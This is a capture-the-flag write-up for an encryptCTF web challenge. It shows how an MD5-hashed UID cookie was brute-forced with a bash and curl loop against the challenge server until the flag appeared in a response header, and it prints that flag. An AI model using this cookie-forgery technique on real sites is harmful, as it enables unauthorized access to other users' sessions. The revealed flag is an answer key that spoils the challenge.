Tags: web 

Rating:

Checking the cookies for the challenge we can see there are two of them

FLAG=encryptCTF{y0u_c4nt_U53_m3}

UID=f899139df5e1059396431415e770c6dd

The UID looks like an md5 hash so decoding that we get 100 so UID=100 and that gives us the FLAG cookie we can't use. So curl and bash to the rescue

`for i in {0..100}; do echo -n $i | md5sum | sed -e "s/ -//"; done > 0-100.md5`

this gives us md5 sums or 0-100 without the trailing -

Once we have the md5 sums we fire them off to curl and dump only the headers and pipe it to grep for encryptctf

`while read line; do curl -sSL --cookie "UID=$line" -D - http://104.154.106.182:8080/; done < 0-100.md5 | grep -i encrypt`

Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

with headers

HTTP/1.1 200 OK

Date: Thu, 04 Apr 2019 11:27:26 GMT

Server: Apache/2.4.25 (Debian)

X-Powered-By: PHP/7.3.3

Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A

Vary: Accept-Encoding

Content-Length: 353

Content-Type: text/html; charset=UTF-8

`FLAG: encryptCTF{4lwa4y5_Ch3ck_7h3_c00ki3s}`